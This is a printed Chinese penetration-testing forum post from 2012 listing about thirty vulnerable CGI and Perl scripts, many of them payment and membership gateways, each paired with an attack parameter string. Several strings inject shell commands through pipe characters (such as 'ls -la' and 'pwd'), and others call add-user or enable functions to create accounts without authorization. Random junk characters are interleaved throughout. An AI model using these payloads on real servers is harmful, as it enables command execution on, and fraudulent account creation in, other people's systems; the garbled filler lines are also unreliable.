中国网络渗透测试联盟
标题:
Cgi-bin 30个漏洞+使用方法
[打印本页]
作者:
admin
时间:
2012-9-13 16:55
标题:
Cgi-bin 30个漏洞+使用方法
==============================
1 z, ? t6 G V/ k( T l$ B
% h$ Z" D4 H4 W8 D6 R2 w& r; m$ J+ Z
/smspass.pl
8 j g$ v$ h3 R. I! e+ [
username=username&password=password
7 y+ ]! `2 F$ B& z/ k, V
- o" p: y% i: k5 D: s" [$ i% k
/index.cgi
0 @' W0 R" d$ z& `1 T
wei=ren&gen=command
( X" z( l7 v2 q% t" ?" M8 O: y
9 V) K! I. y. ^
/passmaster.cgi
# \' ?2 f9 A; r3 q) d/ ]) C% a
Action=Add&Username=Username&Password=Password
; ~9 z* ? y% M% R
& }" b- h% [, H, m2 u2 u4 [
/accountcreate.cgi
. ?% E4 O: ~3 Q' e2 n( v Q: m8 ` C* i
username=username&password=password&ref1=|echo;ls|
1 [- G2 q8 t o/ Z! K6 a
' B- D4 e/ |' }, U
/form.cgi
' R- y9 E3 Z% T/ Z- p* o6 B4 }
name=xxxx&email=email&subject=xxxx&response=|echo;ls|
/ q( e* ]$ y: d3 a! g
" G4 d* Z3 h9 j+ F" ~" L! o
/addusr.pl
9 Z2 X8 D& }7 \1 R' Z0 h) e
/cgi-bin/EuroDebit/addusr.pl
; ?- ]. t! E$ K
user=username&pass=Password&confirm=Password
* k7 N+ q" [# J4 ?2 b z7 R
& ^. R. L% b" a' e
/ccbill-local.asp
* M- P+ O5 y- z% q3 q( p% L# J: Y
post_values=username:password
, T" q! [0 N- u, }9 J5 z
, R* X; G3 Z ^
/count.cgi
: s1 K0 Y1 J* ^8 y& T# M
pinfile=|echo;ls -la;exit|
$ G) P" Q7 s2 u* E
" ^6 h: Z9 |' p" s5 J! o
/recon.cgi
' {7 b+ C; m4 \+ j I
/recon.cgi?search
% p" `" x5 q+ W
searchoption=1&searchfor=|echo;ls -al;exit|
& z) m& A0 ?; f* ^) C* T" ~. {, Z
8 w& n& X) Z# y, S8 z( z
/verotelrum.pl
& m: j( v9 Q+ ^8 U5 `* G" y; }; v
vercode=username:password:dseegsow:add:amount<&30>
2 t$ K- p* p; ^* ?: o2 j6 Q( Z
: X& H& Y0 k0 A
/af.cgi
4 Q& _( x2 F( O5 ]7 o9 t
_browser_out=|echo;ls -la;exit;|
* D) A7 X% p% q/ B& m9 n
' |8 E$ H& n) q
/modify.cgi
9 t" Q* |& O* | g8 J4 A9 z
username=username&password=password&expire=30
2 V- w3 d, f ? `* W9 {
& G& \" u- G4 Q1 ^( j9 N
/openjournal.cgi
, t- C' @, h& G' y: V" j8 z
edit=1&ct=2&go=|echo;ls -al;exit|
( H; P; e% q+ o, ?8 m9 [
& D/ d, O) b2 l
/gx9passwd.cgi
4 U8 G1 y& S+ G1 Z1 Z
cmd=ADD&user=username&pass=password
3 L+ K2 L: z8 `- v
3 P( `/ ]0 f) [& |& v
/probecontrol.cgi
2 c- k8 y3 k R7 z: {
command=enable&username=username&password=password
: x4 c# i- K: @& I3 M
" U9 s/ `9 t; K$ t
/recon.cgi
1 ^- f) Q# k% q* |/ g- l
searchoption=3&searchfor=echo;ls -la;exit
7 a, a$ f. k% y9 K0 v/ [( y
# r5 N1 Z0 @2 g/ W" p' O) u
/htadd.pl
' R" I6 Q# P$ r* l6 ?
configfile=|echo; ls -alt; exit
. U o, x8 W+ K) c
8 ~( k( q- X6 P( l6 J& M, D7 v
/gx9passwd.cgi
0 n6 _) ^4 ~4 k
cmd=ADD&user=username&pass=password
+ g$ V/ }0 E& z4 R l, h
5 O- }) A8 a( O' i0 g
/ibill*.pl
1 `4 O( B+ v, g+ ?: z# g
reqtype=add&authpwd=authpwd&username=username&password=password
0 }: y4 ~! x4 ]% ]9 p- m/ r
) B1 f% k3 R9 j% Z) H
/cpay.cgi
7 E1 `. B) ?! E5 c# {
command=add_member&username=username(EMAIL)&password=password(DES)
8 A' d& c8 v- v( t" Q
E( T* a8 t* W' n
/globill_ut.cgi
* M2 @. Z4 @- c1 H* S b0 i) K4 i
do=add&username=username&password=password&wpassword=password
* u9 A+ H& c" T
+ t8 Y1 p# q% u
/usercontrol.cgi
. n' c3 J0 t: B+ l# R. R
command=enable&username=USER&password=PASS
4 }( P! m4 i, u- j7 `! @
( J: e$ Q* W3 B/ z. @7 N8 z, i" P+ N5 J3 L
/globoSALErum.cgi
& e# R4 [& r# U V( U% S; Q7 B
action=ADD&seccode=seccode&login=username&password=password
# |6 j9 O8 C- d: q1 G: l# Q8 D( B
: s( D& y, p) G8 e" X/ m$ [
/addusr.pl
/ o- M3 S) _. Z8 Q7 x3 K; Y
user=USER&pass=PASS&confirm=PASS
/ b; f3 R( {) |6 K: O: Y% @
7 O9 |4 z. |$ N, G7 U4 `* _
/pincount.cgi
1 c, e3 B6 d4 P
/cgi-bin/mastergate/pincount.cgi
2 L6 G0 O( i$ f! K+ q
pinfile=|echo;pwd;exit|
( C2 ~: M4 k& x3 s: a) F
: R2 q2 B9 j3 s- e
/accountcreate.cgi
( E7 Q7 |) d7 q7 |* k. v
/cgi-bin/gateway/accountcreate.cgi
6 ?4 L5 }- \+ A) L! v( l
username=username&password=password&password2=password&ref1=|echo;ls -al;exit
, Y5 q- A! F& r7 d7 z
8 ~+ @1 B/ J" F
/af.cgi
' V9 k2 _& m3 F/ x- z( q9 E
/env.cgi
9 h, V, C9 X' m7 I2 ~! L' x f
ADD+;echo;pwd;exit
& j& y5 U) H. r" v
! y8 a; f2 y" Q! e: w
/count.cgi
( Q: a2 t5 [" R; [, e/ ^2 B* s F
pinfile=|echo;pwd;exit|
3 F1 J' e+ K% ]! B2 ~' s- W7 S
" {: z- F: i& J; G: |1 o
/recon.cgi
; D, U& B. J( X/ Y. X' m0 u9 z# B3 s
searchoption=1&searchfor=|echo;ls%20-al;exit|
3 C; g- m) _- S; F, y$ J6 ]
3 ~; S, C* f6 u9 D3 q
/add.cgi
4 r$ X5 Z& o( z d& s+ h
username=username&password=password&expire=30
) M u! g+ U- e# |+ K* W8 t/ R
2 u3 i+ E$ g/ `9 R5 n* u$ f
==============================
. x% h3 `# @* I" f3 {# ?
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2